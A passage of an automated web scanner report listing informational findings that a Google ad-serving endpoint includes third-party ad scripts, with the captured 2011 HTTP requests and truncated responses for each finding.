GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676469&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658469201&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658469206&frm=1&adk=2614322350&ga_vid=1759932487.1303658469&ga_sid=1303658469&ga_hid=1147935042&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=22 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1923

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbQ_4gADisoK5X6QKLMxXVZJNJEgHbYzsId3Pg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.150. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681548&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663548258&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663548263&frm=1&adk=2614322350&ga_vid=1845614909.1303663548&ga_sid=1303663548&ga_hid=843104430&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:45:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=ruaS1-KEPhDZ7POOG22JCq5GjVhJ41pOTS5J7yUrVx-v55j_xVvDhCceBPiaSwlbta9a9_cLEBLJEnhT8lFYR69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN4WptGk9EHnij-KmuGWgmGq44jHQGDLrsdmUV6C-zfBNFavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYWecHLMh0arXQueGLxCVl7LoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk8EevYjV2XrbhMMzMhcV-xwH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRTuQAFUOIK7FUK3DgJ_EtiWCk4WVsrPRXoOA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtyhuuVO0TeKhFYqqsQf8k-DhDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCUMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtyxTHP32A_KUUfHvWo7YraQhxKVRQ%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.151. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679347&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661347006&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303661347010&frm=1&adk=2614322350&ga_vid=708894165.1303661347&ga_sid=1303661347&ga_hid=955027229&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=6 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:09:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1836

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=5QzFHW-y8D_lDMUdb7LwPwAAAEAzMwdA5QzFHW-y8D_lDMUdb7LwP7zkV1ZoqVQpSsYda6b2ziUgS7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAKAcBAgUCAAQAAAAAxyLVlgAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303661344%29%3Buf%28%27c%27%2C+52368%2C+1303661344%29%3Buf%28%27r%27%2C+173254%2C+1303661344%29%3Bppv%288991%2C+%272978191519189034172%27%2C+1303661344%2C+1303704544%2C+52368%2C+25553%29%3B&cnd=!chDNzwiQmQMQxskKGAAg0ccBKEsxV_RVCW-y8D9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRLIAAA0VQK7F7NwEhcf652Q8jf4CjJHrr0Jw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBSMEqIEu0TdSiA829sQf_uKGCDNfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgC5gHAAgTIAoXSzwqoAwHoA7wB6AOUAvUDAAAAxIAG6LfOqsGOsobRAQ%26num%3D1%26sig%3DAGiWqtwu_xZ0ijvOML45dyfc2hZbxHNbcg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.152. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658383860&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658383865&frm=1&adk=513358139&ga_vid=27783855.1303658384&ga_sid=1303658384&ga_hid=2094739292&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1771

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-oTsvI3N5T_6hOy8jc3lPwAAAMDMzARA-oTsvI3N5T_5hOy8jc3lPw371D7bYuY9SsYda6b2ziWMP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgAbC0sAAg8BAgUCAAQAAAAAliuUMQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303658392%29%3Buf%28%27c%27%2C+52368%2C+1303658392%29%3Buf%28%27r%27%2C+173256%2C+1303658392%29%3Bppv%288991%2C+%274460361174748560141%27%2C+1303658392%2C+1303701592%2C+52368%2C+25553%29%3B&cnd=!CxAduAiQmQMQyMkKGAAg0ccBKEsxRkF1FY7N5T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&pp=TbQ_jAANSaQK5YDMNydYgG7Im0-Tq_rP9RH-mQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBxA4vjD-0TaSTNcyBlgeAsZ25A9fq-NMBr56U7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYS5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmALCA8ACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAb746GF_uDvrsAB%26num%3D1%26sig%3DAGiWqtzq6jdVFSiz91eOPCoaaXhjQFcD_w%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.153. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676642&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658642845&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658642849&frm=1&adk=2614322350&ga_vid=89410918.1303658643&ga_sid=1303658643&ga_hid=1796920425&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:24:00 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=KcL-dYVrd1LHDnQorXWd06JuB3ZsWJanuRCeZ79ASSwwZDmrtwDCMVQgQ9kqp0OM2DM-fY4Y1621GbWJDt0Ylq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloqXHg5ybSqorAUuT7WodTias5odc_fN8lrM1sP_YEU8L8QXAnSoShrDHVAIaX5P2UXYkMwDMhThyDTSkJz17--1yYfUx0aSWjU5rLek88zmFr8VI-VhbAS9dWBM1kZBJwYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7rjO3SD4VdqcfcG-eEfpQLVpn1pX92TXvJ5-KusSxbhSpzPMafoj1ZGi5kyWVEWKxwaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3iNpimYF7PyrXxKau66bMUFxM9Cpxmh6ci9ZEp0Ip-5iiZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAjwANFgwK5TqKJzYiJ-pjsjysanZM1w5mcw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBN9_Aj0C0TYysNIr1lAenxNi5AsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtzbeNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.154. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681496&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663496481&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663496493&frm=1&adk=2614322350&ga_vid=256732873.1303663496&ga_sid=1303663496&ga_hid=1292892372&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:44:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=uVcXM6yIvX7j2eMeidIQF8a5V_TzjpZVqwZTLNVfkjpU_hRf7pGKgJjnX9jA2aaDJ7MbV9P6kqCVP7g0UHgms69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN4WptGk9EHnij-KmuGWgmGq44jHQGDLrsdmUV6C-zfBNFavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYURF3cxdhB63ePyXNa6x4KFoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk-NauV1Zwl6f2AAejC0b7-vH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRThQAIxusK7Fow09Ae66CdI15yT-MbOhaEIA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuD8thVO0TeuNI7C0sQfrvcCeDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtz0MVZOCUcSk96pPZbUcmjBAnNc9g%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.155. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680578&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662578710&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662578715&frm=1&adk=2614322350&ga_vid=1466159819.1303662579&ga_sid=1303662579&ga_hid=97024423&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:29:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1832

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
